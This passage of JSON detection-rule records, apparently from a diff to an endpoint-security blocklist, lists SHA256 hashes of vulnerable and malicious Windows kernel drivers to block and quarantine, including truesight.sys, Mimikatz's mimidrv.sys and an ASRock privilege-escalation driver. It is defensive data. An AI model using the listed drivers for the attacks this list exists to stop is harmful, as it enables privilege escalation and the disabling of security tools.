"da592dab-86f7-566d-9802-0c4de699aa56", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980681Z", + "creation_date": "2026-03-23T11:45:29.980683Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980689Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fec1c641c7151e931aeb0d1ac59a97d6d3b486c482c1df8794e6424e75e6da1a", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "da657a56-8e84-50d7-b106-28e81106d396", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829604Z", + "creation_date": "2026-03-23T11:45:30.829607Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829616Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9699b885bfce9a6fc0b48484adddd58df1a5ed8161adae1ed58dca1c20c2ea40", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "da6b46b5-9843-51de-9971-2c81730ca5b9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817215Z", + "creation_date": "2026-03-23T11:45:30.817217Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817222Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "33d7046a5d41f4010ad5df632577154ed223dac2ab0ca2da57dbf1724db45a57", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "da6bd2d0-af9b-5f53-b2bc-5f7d9f50829b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157353Z", + "creation_date": "2026-03-23T11:45:31.157355Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157361Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e926e55b953059fa579205ab3f550ef4e6a3f811f8f22cc31e3f6fcabbb7e6ed", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "da761c25-3c8b-5809-a823-955365e3f345", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608299Z", + "creation_date": "2026-03-23T11:45:29.608301Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608307Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"bd1f381e5a3db22e88776b7873d4d2835e9a1ec620571d2b1da0c58f81c84a56", + "comment": "Malicious Kernel Driver (aka hlpdrv.sys) [https://news.sophos.com/en-us/2025/12/06/inside-shanya-a-packer-as-a-service-fueling-modern-attacks/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "da811f79-1969-5bb5-8709-6654fadfeafd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819725Z", + "creation_date": "2026-03-23T11:45:30.819727Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819733Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9bfd24947052bfe9f2979113a7941e40bd7e3a82eaa081a32ad4064159f07c91", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "da8af7b7-67b7-5af7-95ce-0d4299fc5b0f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829376Z", + "creation_date": "2026-03-23T11:45:30.829378Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829384Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "28a7b5e4850c742cda67a352f4bf078ca9edcb2fbeb1475b3bca565385880219", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "da9de128-f8df-5504-8f20-6632376dc6e4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970511Z", + "creation_date": "2026-03-23T11:45:29.970513Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970519Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "443c0ba980d4db9213b654a45248fd855855c1cc81d18812cae9d16729ff9a85", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dae00cbc-5630-5df5-98b4-b5258e70c9b8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824243Z", + "creation_date": "2026-03-23T11:45:31.824246Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824255Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b150744e6f91a6bfba549ebcc0dd1bf3a8cd16c841abd954a876bbdf811d1fa2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "daf855a8-b5a1-5b75-9175-b820d81083eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465284Z", + "creation_date": "2026-03-23T11:45:30.465287Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465296Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cf9451c9ccc5509b9912965f79c2b95eb89d805b2a186d7521d3a262cf5a7a37", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db04da39-2716-51d6-a9f8-9b43c20406fe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823309Z", + "creation_date": "2026-03-23T11:45:31.823312Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823320Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c1363c4a199d2d078869aaaa0adeb581331ee6ad53112cb375a71bbf714f94ad", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db063f08-4220-52dc-9b0d-0d3c5a403e15", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160703Z", + "creation_date": "2026-03-23T11:45:31.160705Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160710Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8894089454a522b94ff6a733e457c27491e3d40c9db7769328de5626cdcf7dcb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db09681a-7ad8-5b49-bc4a-542a626e8fcb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616364Z", + "creation_date": "2026-03-23T11:45:29.616366Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616371Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6c64688444d3e004da77dcfb769d064bb38afceeef7ff915dfc71e60e19ff18a", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db25a70b-abee-530c-9e92-ce3153d53c10", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613407Z", + "creation_date": "2026-03-23T11:45:29.613409Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613414Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838", + "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db29906a-b69a-5007-b76d-73343a5314c8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144856Z", + "creation_date": "2026-03-23T11:45:32.144858Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144864Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0058db5dab98d570d418af5c2ea15333bec7723b5819ab4f433d7e7760fae8ed", + "comment": "Malicious Kernel Driver (aka driver_146b8f4f.sys) [https://www.loldrivers.io/drivers/cea8bd08-a3c5-4ae1-a568-387b909ada67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db29ff68-dc29-56f4-a828-cb095a99f204", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818322Z", + "creation_date": "2026-03-23T11:45:31.818326Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818335Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "df378b30c98cd531929f6db91bb19fd96e5588f9a01b7a969d3d02529d4444db", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db3fbb4d-d679-5188-bd0c-34ced063dae6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833425Z", + "creation_date": "2026-03-23T11:45:30.833428Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833437Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9bbc9d28ae529e9c24db1f081933a2dd41f90e9f66d991732dada38bef414963", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db425a75-ac04-5374-8b48-988ece0d6c27", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477725Z", + 
"creation_date": "2026-03-23T11:45:30.477729Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477738Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "197896f4764d0c9e146cf532bbc531f93e6d61dbf28d25e3e96e2ba48d2b6c6a", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db59834a-5854-5e2f-ba8d-66bc2af475b1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.815650Z", + "creation_date": "2026-03-23T11:45:30.815652Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.815658Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ba386547523c5779e47c59ccb1b853918386cd398f054ac767a3a5b333e3fad3", + "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db637111-070a-5c7e-9148-5ad22b902c0a", + "test_maturity_current_count": 
0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488534Z", + "creation_date": "2026-03-23T11:45:31.488536Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488542Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "037a683b360372f57179f20da624e58c006607bd83e2292b8541a9b8483fa546", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db646702-3a12-5b70-b951-ab785f2d65a7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821370Z", + "creation_date": "2026-03-23T11:45:31.821373Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821381Z", + "rule_level": 
null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c31503f95a59bffd5804dae77a83a5cf469829ec3ff7434bc24a8ad7bd86df35", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db6b8d45-5507-5510-942e-83672fd02eeb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458193Z", + "creation_date": "2026-03-23T11:45:30.458196Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458205Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e4cf438838dc10b188b3d4a318fd9ba2479abb078458d7f97591c723e2d637ce", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db738645-0f73-5f35-9d8a-da181b514da7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491867Z", + "creation_date": "2026-03-23T11:45:31.491886Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491892Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "058d6312910220df60ca41846c1960214e72527bff6ac38fd3c0004ff142e99d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db74607c-7bab-52be-a25d-ac1feb72e807", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606404Z", + "creation_date": "2026-03-23T11:45:29.606405Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606411Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a6e758caceb7e3f548d5038541fcbadce73aec8212b7b8116c8c4ce1168486ec", 
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db74976a-ab9e-53c7-b80c-780bfc2ad02d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140618Z", + "creation_date": "2026-03-23T11:45:31.140620Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140626Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a19776f8a166c203029f85a111c0fc270f6f1265626cc55ca85bef69061143e6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) 